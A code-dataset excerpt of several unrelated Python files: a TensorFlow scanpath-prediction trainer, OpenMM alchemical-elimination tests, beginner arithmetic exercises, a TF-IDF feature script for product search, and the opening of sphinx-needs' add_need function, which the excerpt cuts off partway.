{"seq_id":"84692915","text":"#\n#\n# file: TrainModeB.py\n# author: Jingquan Lee\n# date: 2019-03-13\n#\n#\n\nimport os\n\nimport numpy as np\nimport cv2\nimport tensorflow as tf\n\nfrom model.DResConvLSTM import DResConvLSTM\n\nfrom train.TrainModeA import TrainModeA\n\nclass TrainModeB(TrainModeA):\n    def __init__(self, learning_rate=0.0005, epochs=20, batch_size=10, shape=(48, 64, 16, 16),\n            print_every=1, save_every=1, log_path=None, filter_size=(3, 3, 3, 3),\n            inputs_channel=(2048, 64), c_h_channel=(1, 1), forget_bias=(1.0, 1.0),\n            save_model_path=None, pretrained_model=None, feature_dir=(None, None),\n            scanpath=(None, None), idxs=None, num_steps=8, num_validation=None):\n        \"\"\"Initialize TrainModeB which is extended from TrainModeA, lr indicates low \n        resolution lstm and hr indicates high resolution lstm\n        Args(different from TrainModeA):\n            -shape: a tuple of 4 ints, (lr rows, lr cols, hr rows, hr cols)\n            -filter_size: a tuple of 4 ints, (lr rows, lr cols, hr rows, hr cols) of\n             filter size in lr or hr\n            -inputs_channel: a tuple of 2 ints, (lr input channels, hr input channels)\n            -c_h_channel: a tuple of 2 ints, (lr channels, hr channels)\n            -forget_bias: a tuple of 2 ints, (lr forget bias, hr forget bias)\n            -init_hidden: a tuple of 2 Tensors, (lr 
hidden initial tensor,\n hr hidden initial Tensor)\n -scanpath: a tuple of 2 Tensors, (lr gt scanpath, hr gt scanpath)\n \"\"\"\n super().__init__(learning_rate=learning_rate, epochs=epochs, batch_size=batch_size,\n shape=shape, print_every=print_every, save_every=save_every, log_path=log_path,\n filter_size=filter_size, inputs_channel=inputs_channel, c_h_channel=c_h_channel,\n forget_bias=forget_bias, init_hidden=(None, None), save_model_path=save_model_path,\n pretrained_model=pretrained_model, feature_dir=feature_dir, scanpath=scanpath,\n idxs=idxs, num_steps=num_steps, num_validation=num_validation)\n\n def _init_model(self):\n self._preds = DResConvLSTM(filter_size=self._filter_size,\n inputs_channel=self._inputs_channel, shape=self._shape,\n c_h_channel=self._c_h_channel, forget_bias=self._forget_bias,\n num_steps=self._num_steps, batch_size=self._batch_size)\n\n def _init_holder(self):\n self._lr_labels_holder = tf.placeholder(name='lr_labels', shape=(None, self._num_steps, 2), dtype=tf.float32)\n self._hr_labels_holder = tf.placeholder(name='hr_labels', shape=(None, self._num_steps, 2), dtype=tf.float32)\n self._labels_holder=tf.placeholder(name='labels', shape=(2, None, self._num_steps, 2),\n dtype=tf.float32)\n\n def _compute_loss(self):\n preds = self._preds()\n lr_labels = self._lr_labels_holder\n hr_labels = self._hr_labels_holder\n loss = 0.0\n weight = lr_labels > 0\n weight = tf.cast(weight, dtype=tf.float32)\n lr_preds = tf.multiply(preds[0], weight)\n weight = hr_labels > 0\n weight = tf.cast(weight, dtype=tf.float32)\n hr_preds = tf.multiply(preds[1], weight)\n loss += tf.losses.mean_squared_error(lr_labels, lr_preds)\n loss += tf.losses.mean_squared_error(hr_labels, hr_preds)\n return loss\n \n def _decode_predicts(self, predicts):\n lr_preds = predicts[0] \n hr_preds = predicts[1]\n lr_preds[:, :, 0] = lr_preds[:, :, 0] * self._shape[1]\n lr_preds[:, :, 1] = lr_preds[:, :, 1] * self._shape[0]\n hr_preds[:, :, 0] = hr_preds[:, :, 0] * self._shape[3]\n hr_preds[:, :, 1] = hr_preds[:, :, 1] * self._shape[2]\n lr_preds = np.around(lr_preds, 0)\n hr_preds = np.around(hr_preds, 0)\n preds = np.zeros(np.shape(lr_preds))\n preds[:, :, 0] = lr_preds[:, :, 0] * self._shape[3] + hr_preds[:, :, 0]\n preds[:, :, 1] = lr_preds[:, :, 1] * self._shape[2] + hr_preds[:, :, 1]\n preds = preds.astype('int32')\n preds = np.concatenate([preds[:, :, 0], preds[:, :, 1]], axis=1)\n return preds\n \n #def __get_hr_feature_idx(self, coord):\n # \"\"\"Gnerate the idx in hr region feature, for sake of\n # drawing regions of feature as a list.\n # \"\"\"\n # x = np.around(coord[:, 0] * self._shape[1], 0)\n # y = np.around(coord[:, 1] * self._shape[0], 0)\n # idx = y * self._shape[1] + x\n # idx = idx.astype('int32')\n # return idx\n\n def __get_h_init(self, shape, coord, kernel_size):\n \"\"\"Generate initial hidden state by using Gaussian kernel\n blur initial coordination, sigma is -1.\n Args:\n -shape: a tuple of (int, int), shape of hidden state\n -coord: a tuple of (float, float), normalized coordination\n -kernel_size: a int, Gaussian kernel size\n Returns:\n -init: a Tensor, generated initial hidden state\n \"\"\"\n init = np.zeros(shape)\n coord = (np.around(coord[0] * shape[1]), np.around(coord[1] * shape[0]))\n init[int(coord[1])][int(coord[0])] = 1.0\n kernel = cv2.getGaussianKernel(kernel_size, sigma=-1)\n init = cv2.filter2D(init, ddepth = -1, kernel=kernel)\n init = cv2.filter2D(init, ddepth = -1, kernel=kernel.T)\n init = init[:, :, np.newaxis]\n return init\n\n def 
_generate_feed_dict(self, idxs):\n        lr_features = []\n        hr_features = []\n        for idx in idxs:\n            lr_feature = np.load(os.path.join(self._feature_dir[0], str(idx[0])+'.npy'))\n            hr_feature = np.load(os.path.join(self._feature_dir[1], str(idx[0])+'.npy'))\n#            region_idx = self.__get_hr_feature_idx(self._scanpath[0][idx[0]][idx[1]][0: 8, :])\n            lr_features.append(lr_feature[:, :, :])\n            hr_features.append(hr_feature[:, :, :, :])\n        lr_features = np.array(lr_features)\n        hr_features = np.array(hr_features)\n        lr_scanpaths = []\n        hr_scanpaths = []\n        for idx in idxs:\n            lr_scanpath = self._scanpath[0][idx[0]][idx[1]][1: 9, 0: 2]\n            lr_scanpaths.append(lr_scanpath)\n            hr_scanpath = self._scanpath[1][idx[0]][idx[1]][1: 9, 0: 2]\n            hr_scanpaths.append(hr_scanpath)\n        lr_scanpaths = np.array(lr_scanpaths)\n        hr_scanpaths = np.array(hr_scanpaths)\n        lr_h_init = []\n        hr_h_init = []\n        for idx in idxs:\n            lr_h_init.append(self.__get_h_init(shape=(self._shape[0], self._shape[1]),\n                    coord=(self._scanpath[0][idx[0]][idx[1]][0, 0],\n                    self._scanpath[0][idx[0]][idx[1]][0, 1]),\n                    kernel_size=15))\n            hr_h_init.append(self.__get_h_init(shape=(self._shape[2], self._shape[3]),\n                    coord=(self._scanpath[1][idx[0]][idx[1]][0, 0],\n                    self._scanpath[1][idx[0]][idx[1]][0, 1]),\n                    kernel_size=7))\n        lr_h_init = np.array(lr_h_init)\n        hr_h_init = np.array(hr_h_init)\n        lr_c_init = np.zeros((np.shape(idxs)[0], self._shape[0], self._shape[1], self._c_h_channel[0]))\n        hr_c_init = np.zeros((np.shape(idxs)[0], self._shape[2], self._shape[3], self._c_h_channel[1]))\n        feed_dict = {self._lr_labels_holder: lr_scanpaths, self._hr_labels_holder: hr_scanpaths,\n                self._preds.lr_h_init: lr_h_init, self._preds.hr_h_init: hr_h_init,\n                self._preds.lr_c_init: lr_c_init, self._preds.hr_c_init: hr_c_init,\n                self._preds.lr_inputs: lr_features, self._preds.hr_inputs: hr_features,\n                self._labels_holder: [lr_scanpaths, hr_scanpaths]}\n        return feed_dict\n","sub_path":"train/TrainModeB.py","file_name":"TrainModeB.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"229215276","text":"\"\"\"\nUnit tests for NCMC switching engine.\n\n\"\"\"\n\n__author__ = 'John D. 
Chodera'\n\n################################################################################\n# IMPORTS\n################################################################################\n\nfrom simtk import openmm, unit\nimport math\nimport numpy as np\nfrom functools import partial\n\n################################################################################\n# CONSTANTS\n################################################################################\n\nkB = unit.BOLTZMANN_CONSTANT_kB * unit.AVOGADRO_CONSTANT_NA\n\n################################################################################\n# TESTS\n################################################################################\n\ndef simulate(system, positions, nsteps=500, timestep=1.0*unit.femtoseconds, temperature=300.0*unit.kelvin, collision_rate=20.0/unit.picoseconds):\n integrator = openmm.LangevinIntegrator(temperature, collision_rate, timestep)\n context = openmm.Context(system, integrator)\n context.setPositions(positions)\n context.setVelocitiesToTemperature(temperature)\n integrator.step(nsteps)\n positions = context.getState(getPositions=True).getPositions(asNumpy=True)\n return positions\n\ndef check_alchemical_elimination(ncmc_nsteps=50):\n \"\"\"\n Test alchemical elimination engine on alanine dipeptide null transformation.\n\n \"\"\"\n\n NSIGMA_MAX = 6.0 # number of standard errors away from analytical solution tolerated before Exception is thrown\n\n # Create an alanine dipeptide null transformation, where N-methyl group is deleted and then inserted.\n from openmmtools import testsystems\n testsystem = testsystems.AlanineDipeptideVacuum()\n from perses.rjmc.topology_proposal import TopologyProposal\n new_to_old_atom_map = { index : index for index in range(testsystem.system.getNumParticles()) if (index > 3) } # all atoms but N-methyl\n topology_proposal = TopologyProposal(old_system=testsystem.system, old_topology=testsystem.topology, old_positions=testsystem.positions, new_system=testsystem.system, new_topology=testsystem.topology, logp_proposal=0.0, new_to_old_atom_map=new_to_old_atom_map, metadata=dict())\n\n # Initialize engine\n from perses.annihilation.ncmc_switching import NCMCEngine\n ncmc_engine = NCMCEngine(nsteps=ncmc_nsteps)\n\n niterations = 20 # number of round-trip switching trials\n positions = testsystem.positions\n logP_insert_n = np.zeros([niterations], np.float64)\n logP_delete_n = np.zeros([niterations], np.float64)\n for iteration in range(niterations):\n # Equilibrate\n positions = simulate(testsystem.system, positions)\n\n # Delete atoms\n [positions, logP_delete] = ncmc_engine.integrate(topology_proposal, positions, direction='delete')\n\n # Insert atoms\n [positions, logP_insert] = ncmc_engine.integrate(topology_proposal, positions, direction='insert')\n\n # Compute total probability\n logP_delete_n[iteration] = logP_delete\n logP_insert_n[iteration] = logP_insert\n\n\n # Check free energy difference is withing NSIGMA_MAX standard errors of zero.\n logP_n = logP_delete_n + logP_insert_n\n from pymbar import EXP\n [df, ddf] = EXP(logP_n)\n if (abs(df) > NSIGMA_MAX * ddf):\n msg = 'Delta F (%d steps switching) = %f +- %f kT; should be within %f sigma of 0' % (ncmc_nsteps, df, ddf, NSIGMA_MAX)\n msg += 'delete logP:\\n'\n msg += str(logP_delete_n) + '\\n'\n msg += 'insert logP:\\n'\n msg += str(logP_insert_n) + '\\n'\n msg += 'logP:\\n'\n msg += str(logP_n) + '\\n'\n raise Exception(msg)\n\ndef test_alchemical_elimination():\n \"\"\"\n Check alchemical elimination for alanine dipeptide 
in vacuum with 0, 1, and 50 switching steps.\n\n \"\"\"\n for ncmc_nsteps in [0, 1, 50]:\n f = partial(check_alchemical_elimination, ncmc_nsteps)\n f.description = \"Testing alchemical elimination using alanine dipeptide with %d NCMC steps\" % ncmc_nsteps\n yield f\n","sub_path":"perses/tests/test_elimination.py","file_name":"test_elimination.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370982095","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 17 17:37:38 2016\n\n@author: tofu\n\"\"\"\nname = \"ana\"\nx = 23\ny = 4.5323232\na = x / y\n\nprint(name)\nprint(a)\n\napples = 5\noranges = 10\nfruits = apples + oranges\nprint(\"Amount of fruits available:\", fruits)\napples = 20\nfruits = apples + oranges\nprint(\"Amount of fruits now available:\", fruits)\n\nsix = 2 + 2 + 2\nprint(six)\nneg = six * -6\nprint(neg)\nneg /=10\nprint(neg)\n\nhalf = 0.25 * 2\nprint(\"First half:\",half)\nother_half = 1.0 - half\nprint(\"Now the other half:\",other_half)\n\ncold = True\nrain = False\nday = cold and rain\n\none = \"one\"\nanother_one = \"1.0\"\nlast_one = \"1 one\"\n\ntest = None\nprint(type(test))\n\nint(True)\n\n\nminutes_to_convert = 324\nhours_decimal = minutes_to_convert/60\nhours_part = int(hours_decimal)\nminutes_part = minutes_to_convert%60\nprint(\"Hours\")\nprint(hours_part)\nprint(\"Minutes\")\nprint(minutes_part)","sub_path":"code_exercises/basic_exercises.py","file_name":"basic_exercises.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651690826","text":"# Imports\nimport pandas as pd\nimport numpy as np\nfrom statistics import mean, stdev\nfrom math import sqrt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport re\nfrom scipy.sparse import csr_matrix\n\n# Suppress warnings \nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# Import data\ndataframe = pd.read_csv('dataframe_NLP.csv', header=0, sep=\",\", encoding=\"ISO-8859-1\")\ndataframe[\"product_words\"] = dataframe[\"product_words\"].apply(lambda x: eval(x))\ndataframe[\"research_words\"] = dataframe[\"research_words\"].apply(lambda x: eval(x))\ndataframe[\"brand_words\"] = dataframe[\"brand_words\"].apply(lambda x: eval(x))\ndataframe[\"product_description_words\"] = dataframe[\"product_description_words\"].apply(lambda x: eval(x))\ndataframe[\"list_attributes_words\"] = dataframe[\"list_attributes_words\"].apply(lambda x: eval(x))\ndataframe[\"corrected_research_words\"] = dataframe[\"corrected_research_words\"].apply(lambda x: eval(x))\n\n# Create corpus from dataframe\ncorpus = list(dataframe[\"product_words\"])\npiv_corpus = len(corpus)\ncorpus += list(dataframe[\"product_description_words\"])\ncorpus += list(dataframe[\"list_attributes_words\"])\ncorpus += list(dataframe[\"brand_words\"])\ncorpus += list(dataframe[\"corrected_research_words\"])\n\ndef remove_figures(vec):\n new_vec = []\n for elt in vec:\n if re.sub(r\"([0-9]+)\", \"f\", elt) != \"f\":\n new_vec.append(elt)\n return new_vec\n\ncorpus = list(map(remove_figures, corpus))\n\ndef join_list(lt):\n return \" \".join(lt)\n\ncorpus = list(map(join_list, corpus))\n\n# TF-IDF\nvec = TfidfVectorizer()\nvec1 = vec.fit_transform(corpus)\n\n# Attribution aux variables\ntitle = vec1[0:piv_corpus]\ndescription = vec1[piv_corpus:2*piv_corpus]\nattributes = vec1[2*piv_corpus:3*piv_corpus]\nbrand = 
vec1[3*piv_corpus:4*piv_corpus]\nsearch = vec1[4*piv_corpus:5*piv_corpus]\n\n# Nouvelles features\nproduit_vec1 = []\nproduit_vec2 = []\nproduit_vec3 = []\nproduit_vec4 = []\n\ncar1_title = [] # min diff de 0\ncar2_title = [] # max\ncar3_title = [] # mean without 0\ncar4_title = [] # nbre diff de 0\ncar5_title = [] # somme\n\ncar1_description = [] # min diff de 0\ncar2_description = [] # max\ncar3_description = [] # mean without 0\ncar4_description = [] # nbre diff de 0\ncar5_description = [] # somme\n\ncar1_attributes = [] # min diff de 0\ncar2_attributes = [] # max\ncar3_attributes = [] # mean without 0\ncar4_attributes = [] # nbre diff de 0\ncar5_attributes = [] # somme\n\ncar1_brand = [] # min diff de 0\ncar2_brand = [] # max\ncar3_brand = [] # mean without 0\ncar4_brand = [] # nbre diff de 0\ncar5_brand = [] # somme\n\ncar1_search = [] # min diff de 0\ncar2_search = [] # max\ncar3_search = [] # mean without 0\ncar4_search = [] # nbre diff de 0\ncar5_search = [] # somme\n\nfor i in range(piv_corpus):\n elt = list(title[i].nonzero()[1])\n elt = title[i].toarray()[0][elt]\n if elt != []:\n car1_title.append(min(elt)) # min diff de 0\n car2_title.append(max(elt)) # max\n car3_title.append(mean(elt)) # mean without 0\n car4_title.append(len(elt)) # nbre diff de 0\n car5_title.append(sum(elt)) # somme\n else:\n car1_title.append(0) # min diff de 0\n car2_title.append(0) # max\n car3_title.append(0) # mean without 0\n car4_title.append(0) # nbre diff de 0\n car5_title.append(0) # somme\n #\n elt = list(description[i].nonzero()[1])\n elt = description[i].toarray()[0][elt]\n if elt != []:\n car1_description.append(min(elt)) # min diff de 0\n car2_description.append(max(elt)) # max\n car3_description.append(mean(elt)) # mean without 0\n car4_description.append(len(elt)) # nbre diff de 0\n car5_description.append(sum(elt)) # somme\n else:\n car1_description.append(0) # min diff de 0\n car2_description.append(0) # max\n car3_description.append(0) # mean without 0\n car4_description.append(0) # nbre diff de 0\n car5_description.append(0) # somme \n #\n elt = list(attributes[i].nonzero()[1])\n elt = attributes[i].toarray()[0][elt]\n if elt != []:\n car1_attributes.append(min(elt)) # min diff de 0\n car2_attributes.append(max(elt)) # max\n car3_attributes.append(mean(elt)) # mean without 0\n car4_attributes.append(len(elt)) # nbre diff de 0\n car5_attributes.append(sum(elt)) # somme\n else:\n car1_attributes.append(0) # min diff de 0\n car2_attributes.append(0) # max\n car3_attributes.append(0) # mean without 0\n car4_attributes.append(0) # nbre diff de 0\n car5_attributes.append(0) # somme\n #\n elt = list(brand[i].nonzero()[1])\n elt = brand[i].toarray()[0][elt]\n if elt != []:\n car1_brand.append(min(elt)) # min diff de 0\n car2_brand.append(max(elt)) # max\n car3_brand.append(mean(elt)) # mean without 0\n car4_brand.append(len(elt)) # nbre diff de 0\n car5_brand.append(sum(elt)) # somme\n else:\n car1_brand.append(0) # min diff de 0\n car2_brand.append(0) # max\n car3_brand.append(0) # mean without 0\n car4_brand.append(0) # nbre diff de 0\n car5_brand.append(0) # somme\n #\n elt = list(search[i].nonzero()[1])\n elt = search[i].toarray()[0][elt]\n if elt != []:\n car1_search.append(min(elt)) # min diff de 0\n car2_search.append(max(elt)) # max\n car3_search.append(mean(elt)) # mean without 0\n car4_search.append(len(elt)) # nbre diff de 0\n car5_search.append(sum(elt)) # somme\n else:\n car1_search.append(0) # min diff de 0\n car2_search.append(0) # max\n car3_search.append(0) # mean without 0\n 
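# (added note) min/max/mean are undefined on an empty selection, so every\n        # statistic for this field deliberately falls back to 0 in this branch\n        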
car4_search.append(0) # nbre diff de 0\n car5_search.append(0) # somme\n #\n produit_vec1.append(np.vdot(title[i].toarray()[0], search[i].toarray()[0]))\n produit_vec2.append(np.vdot(description[i].toarray()[0], search[i].toarray()[0]))\n produit_vec3.append(np.vdot(attributes[i].toarray()[0], search[i].toarray()[0]))\n produit_vec4.append(np.vdot(brand[i].toarray()[0], search[i].toarray()[0]))\n\n# Avec .idf_\n# Vect with 1 and 0\n# Every non nul values set to 1\nkeep = vec1.nonzero()\nn_keep = len(keep[0])\n\nrelu_vec1 = csr_matrix((np.ones(n_keep), (keep[0], keep[1])), shape=vec1.shape)\nrelu_title = relu_vec1[0:piv_corpus]\nrelu_description = relu_vec1[piv_corpus:2*piv_corpus]\nrelu_attributes = relu_vec1[2*piv_corpus:3*piv_corpus]\nrelu_brand = relu_vec1[3*piv_corpus:4*piv_corpus]\nrelu_search = relu_vec1[4*piv_corpus:5*piv_corpus]\n\n# More features with .idf_\nvec = vec.idf_\n\nproduit_vec5 = []\nproduit_vec6 = []\nproduit_vec7 = []\nproduit_vec8 = []\n\nproduit_vec9 = []\nproduit_vec10 = []\nproduit_vec11 = []\nproduit_vec12 = []\n\ncar1_rv_search = [] # min diff de 0\ncar2_rv_search = [] # max\ncar3_rv_search = [] # mean without 0\ncar4_rv_search = [] # nbre diff de 0\ncar5_rv_search = [] # somme\n\ncar1_rv_title = [] # min diff de 0\ncar2_rv_title = [] # max\ncar3_rv_title = [] # mean without 0\ncar4_rv_title = [] # nbre diff de 0\ncar5_rv_title = [] # somme\n\ncar1_rv_description = [] # min diff de 0\ncar2_rv_description = [] # max\ncar3_rv_description = [] # mean without 0\ncar4_rv_description = [] # nbre diff de 0\ncar5_rv_description = [] # somme\n\ncar1_rv_attributes = [] # min diff de 0\ncar2_rv_attributes = [] # max\ncar3_rv_attributes = [] # mean without 0\ncar4_rv_attributes = [] # nbre diff de 0\ncar5_rv_attributes = [] # somme\n\ncar1_rv_brand = [] # min diff de 0\ncar2_rv_brand = [] # max\ncar3_rv_brand = [] # mean without 0\ncar4_rv_brand = [] # nbre diff de 0\ncar5_rv_brand = [] # somme\n\nfor i in range(piv_corpus):\n r_title = relu_title[i].toarray()[0]\n r_description = relu_description[i].toarray()[0]\n r_attributes = relu_attributes[i].toarray()[0]\n r_brand = relu_brand[i].toarray()[0]\n r_search = relu_search[i].toarray()[0]\n produit_vec5.append(np.vdot(r_title, r_search))\n produit_vec6.append(np.vdot(r_description, r_search))\n produit_vec7.append(np.vdot(r_attributes, r_search))\n produit_vec8.append(np.vdot(r_brand, r_search))\n #\n r_search = relu_search[i].toarray()[0]\n #\n a = relu_search[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_search.append(min(elt)) # min diff de 0\n car2_rv_search.append(max(elt)) # max\n car3_rv_search.append(mean(elt)) # mean without 0\n car4_rv_search.append(len(elt)) # nbre diff de 0\n car5_rv_search.append(sum(elt)) # somme\n else:\n car1_rv_search.append(0) # min diff de 0\n car2_rv_search.append(0) # max\n car3_rv_search.append(0) # mean without 0\n car4_rv_search.append(0) # nbre diff de 0\n car5_rv_search.append(0) # somme\n #\n a = relu_title[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_title.append(min(elt)) # min diff de 0\n car2_rv_title.append(max(elt)) # max\n car3_rv_title.append(mean(elt)) # mean without 0\n car4_rv_title.append(len(elt)) # nbre diff de 0\n car5_rv_title.append(sum(elt)) # somme\n else:\n car1_rv_title.append(0) # min diff de 0\n car2_rv_title.append(0) # max\n car3_rv_title.append(0) # mean without 0\n car4_rv_title.append(0) # nbre diff de 0\n car5_rv_title.append(0) # somme\n 
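# (added note) here 'a' is the 0/1 title vector re-weighted by per-term idf, so\n    # the dot product with the binary search vector below sums idf over shared terms\n    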
produit_vec9.append(np.vdot(a, r_search))\n #\n a = relu_description[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_description.append(min(elt)) # min diff de 0\n car2_rv_description.append(max(elt)) # max\n car3_rv_description.append(mean(elt)) # mean without 0\n car4_rv_description.append(len(elt)) # nbre diff de 0\n car5_rv_description.append(sum(elt)) # somme\n else:\n car1_rv_description.append(0) # min diff de 0\n car2_rv_description.append(0) # max\n car3_rv_description.append(0) # mean without 0\n car4_rv_description.append(0) # nbre diff de 0\n car5_rv_description.append(0) # somme\n produit_vec10.append(np.vdot(a, r_search))\n #\n a = relu_attributes[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_attributes.append(min(elt)) # min diff de 0\n car2_rv_attributes.append(max(elt)) # max\n car3_rv_attributes.append(mean(elt)) # mean without 0\n car4_rv_attributes.append(len(elt)) # nbre diff de 0\n car5_rv_attributes.append(sum(elt)) # somme\n else:\n car1_rv_attributes.append(0) # min diff de 0\n car2_rv_attributes.append(0) # max\n car3_rv_attributes.append(0) # mean without 0\n car4_rv_attributes.append(0) # nbre diff de 0\n car5_rv_attributes.append(0) # somme\n produit_vec11.append(np.vdot(a, r_search))\n #\n a = relu_brand[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_brand.append(min(elt)) # min diff de 0\n car2_rv_brand.append(max(elt)) # max\n car3_rv_brand.append(mean(elt)) # mean without 0\n car4_rv_brand.append(len(elt)) # nbre diff de 0\n car5_rv_brand.append(sum(elt)) # somme\n else:\n car1_rv_brand.append(0) # min diff de 0\n car2_rv_brand.append(0) # max\n car3_rv_brand.append(0) # mean without 0\n car4_rv_brand.append(0) # nbre diff de 0\n car5_rv_brand.append(0) # somme\n produit_vec12.append(np.vdot(a, r_search))\n\n# New dataframe with features\ndf_model = pd.DataFrame({\"id\":dataframe.id, \"f1\":produit_vec1})\ndf_model[\"f2\"] = produit_vec2\ndf_model[\"f3\"] = produit_vec3\ndf_model[\"f4\"] = produit_vec4\ndf_model[\"f5\"] = produit_vec5\ndf_model[\"f6\"] = produit_vec6\ndf_model[\"f7\"] = produit_vec7\ndf_model[\"f8\"] = produit_vec8\ndf_model[\"f9\"] = produit_vec9\ndf_model[\"f10\"] = produit_vec10\ndf_model[\"f11\"] = produit_vec11\ndf_model[\"f12\"] = produit_vec12\ndf_model[\"car1_title\"] = car1_title\ndf_model[\"car2_title\"] = car2_title\ndf_model[\"car3_title\"] = car3_title\ndf_model[\"car4_title\"] = car4_title\ndf_model[\"car5_title\"] = car5_title\ndf_model[\"car1_description\"] = car1_description\ndf_model[\"car2_description\"] = car2_description\ndf_model[\"car3_description\"] = car3_description\ndf_model[\"car4_description\"] = car4_description\ndf_model[\"car5_description\"] = car5_description\ndf_model[\"car1_attributes\"] = car1_attributes\ndf_model[\"car2_attributes\"] = car2_attributes\ndf_model[\"car3_attributes\"] = car3_attributes\ndf_model[\"car4_attributes\"] = car4_attributes\ndf_model[\"car5_attributes\"] = car5_attributes\ndf_model[\"car1_brand\"] = car1_brand\ndf_model[\"car2_brand\"] = car2_brand\ndf_model[\"car3_brand\"] = car3_brand\ndf_model[\"car4_brand\"] = car4_brand\ndf_model[\"car5_brand\"] = car5_brand\ndf_model[\"car1_search\"] = car1_search\ndf_model[\"car2_search\"] = car2_search\ndf_model[\"car3_search\"] = car3_search\ndf_model[\"car4_search\"] = car4_search\ndf_model[\"car5_search\"] = car5_search\ndf_model[\"car1_rv_search\"] = car1_rv_search\ndf_model[\"car2_rv_search\"] = 
car2_rv_search\ndf_model[\"car3_rv_search\"] = car3_rv_search\ndf_model[\"car4_rv_search\"] = car4_rv_search\ndf_model[\"car5_rv_search\"] = car5_rv_search\ndf_model[\"car1_rv_title\"] = car1_rv_title\ndf_model[\"car2_rv_title\"] = car2_rv_title\ndf_model[\"car3_rv_title\"] = car3_rv_title\ndf_model[\"car4_rv_title\"] = car4_rv_title\ndf_model[\"car5_rv_title\"] = car5_rv_title\ndf_model[\"car1_rv_description\"] = car1_rv_description\ndf_model[\"car2_rv_description\"] = car2_rv_description\ndf_model[\"car3_rv_description\"] = car3_rv_description\ndf_model[\"car4_rv_description\"] = car4_rv_description\ndf_model[\"car5_rv_description\"] = car5_rv_description\ndf_model[\"car1_rv_attributes\"] = car1_rv_attributes\ndf_model[\"car2_rv_attributes\"] = car2_rv_attributes\ndf_model[\"car3_rv_attributes\"] = car3_rv_attributes\ndf_model[\"car4_rv_attributes\"] = car4_rv_attributes\ndf_model[\"car5_rv_attributes\"] = car5_rv_attributes\ndf_model[\"car1_rv_brand\"] = car1_rv_brand\ndf_model[\"car2_rv_brand\"] = car2_rv_brand\ndf_model[\"car3_rv_brand\"] = car3_rv_brand\ndf_model[\"car4_rv_brand\"] = car4_rv_brand\ndf_model[\"car5_rv_brand\"] = car5_rv_brand\n\ndf_model.to_csv(\"TF_IDF_features.csv\", index=False)","sub_path":"TF_IDF_features.py","file_name":"TF_IDF_features.py","file_ext":"py","file_size_in_byte":14055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262675431","text":"import hashlib\nimport re\nimport os\nfrom docutils import nodes\nfrom jinja2 import Template\nfrom sphinxcontrib.needs.api.exceptions import NeedsNoIdException, NeedsInvalidException, NeedsStatusNotAllowed, \\\n NeedsTagNotAllowed, NeedsDuplicatedId, NeedsInvalidOption, NeedsTemplateException\nimport sphinxcontrib.needs.directives.need\nfrom sphinx.util.nodes import nested_parse_with_titles\nfrom sphinxcontrib.needs.roles.need_part import update_need_with_parts, find_parts\nfrom sphinxcontrib.needs.filter_common import filter_single_need\nimport sphinx\nfrom docutils.statemachine import ViewList\nfrom pkg_resources import parse_version\nsphinx_version = sphinx.__version__\nif parse_version(sphinx_version) >= parse_version(\"1.6\"):\n from sphinx.util import logging\nelse:\n import logging\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef add_need(app, state, docname, lineno, need_type, title, id=None, content=\"\", status=None, tags=None,\n links_string=None, hide=False, hide_tags=False, hide_status=False, collapse=None, style=None,\n layout=None, template=None, pre_template=None, post_template=None, **kwargs):\n \"\"\"\n Creates a new need and returns its node.\n\n ``add_need`` allows to create needs programmatically and use its returned node to be integrated in any\n docutils based structure.\n\n ``kwags`` can contain options defined in ``needs_extra_options`` and ``needs_extra_links``.\n If an entry is found in ``kwags``, which *is not* specified in the configuration or registered e.g. via\n ``add_extra_option``, an exception is raised.\n\n **Usage**:\n\n Normally needs get created during handling of a specialised directive.\n So this pseudo-code shows how to use ``add_need`` inside such a directive.\n\n .. 
code-block:: python\n\n from docutils.parsers.rst import Directive\n from sphinxcontrib.needs.api import add_need\n\n class MyDirective(Directive)\n # configs and init routine\n\n def run():\n main_section = []\n\n docname = self.state.document.settings.env.docname\n\n # All needed sphinx-internal information we can take from our current directive class.\n # e..g app, state, lineno\n main_section += add_need(self.env.app, self.state, docname, self.lineno,\n need_type=\"req\", title=\"my title\", id=\"ID_001\"\n content=self.content)\n\n # Feel free to add custom stuff to main_section like sections, text, ...\n\n return main_section\n\n :param app: Sphinx application object.\n :param state: Current state object.\n :param docname: documentation name.\n :param lineno: line number.\n :param need_type: Name of the need type to create.\n :param title: String as title.\n :param id: ID as string. If not given, a id will get generated.\n :param content: Content as single string.\n :param status: Status as string.\n :param tags: Tags as single string.\n :param links_string: Links as single string.\n :param hide: boolean value.\n :param hide_tags: boolean value. (Not used with Sphinx-Needs >0.5.0)\n :param hide_status: boolean value. (Not used with Sphinx-Needs >0.5.0)\n :param collapse: boolean value.\n :param style: String value of class attribute of node.\n :param layout: String value of layout definition to use\n :param template: Template name to use for the content of this need\n :param pre_template: Template name to use for content added before need\n :param post_template: Template name to use for the content added after need\n\n :return: node\n \"\"\"\n #############################################################################################\n # Get environment\n #############################################################################################\n env = app.env\n types = env.app.config.needs_types\n type_name = \"\"\n type_prefix = \"\"\n type_color = \"\"\n type_style = \"\"\n found = False\n for ntype in types:\n if ntype[\"directive\"] == need_type:\n type_name = ntype[\"title\"]\n type_prefix = ntype[\"prefix\"]\n type_color = ntype[\"color\"]\n type_style = ntype[\"style\"]\n found = True\n break\n if not found:\n # This should never happen. But it may happen, if Sphinx is called multiples times\n # inside one ongoing python process.\n # In this case the configuration from a prior 